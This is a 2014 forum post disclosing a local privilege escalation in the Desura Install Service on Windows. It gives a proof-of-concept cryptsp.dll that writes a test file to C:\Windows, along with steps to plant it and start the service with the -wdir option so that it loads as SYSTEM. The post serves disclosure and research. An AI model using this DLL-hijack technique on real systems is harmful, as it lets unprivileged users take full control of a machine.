Desura Install Service privilege escalation
Page 1 of 1

Author:  aluigi [ Fri Aug 15, 2014 7:33 pm ]
Post subject:  Desura Install Service privilege escalation

The following was a quick test I made in the far October 2012 and it's still working.

"Desura is a digital distribution platform developed by Linden Research":

Basically it's a competitor of Steam that, I remember, was mainly focused on indie games and then has been bought by Linden, the guys behind Second Life.

Anyway it's just a local privilege escaltion to become SYSTEM by using an option of the installer service, not so important but interesting to show.

Compile a dll with the name cryptsp.dll, the following is a quick example of dll for testing if you are able to write in a folder that requires Administrator privileges:
#include <windows.h>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ulReason, LPVOID lpReserved) {
    if(ulReason == DLL_PROCESS_ATTACH) {
        system("echo HELLO > c:\\windows\\poc.txt");
    return TRUE;

Create an empty folder called bin and put the dll there.

Kill/close the Desura client if it's running.

Let's say your current folder is z:\poc and the dll is located in z:\poc\bin\cryptsp.dll
Now start the service (any user can do that, just like with Steam) using the -wdir option:
sc start "Desura Install Service" -wdir z:\poc

That's all.

Source code of Desura Service:
https://github.com/desura/Desurium/blob ... ceMain.cpp

If you want to read about something similar for Steam:
http://revuln.com/files/ReVuln_Steam_Se ... curity.pdf

Page 1 of 1 All times are UTC
Powered by phpBB® Forum Software © phpBB Limited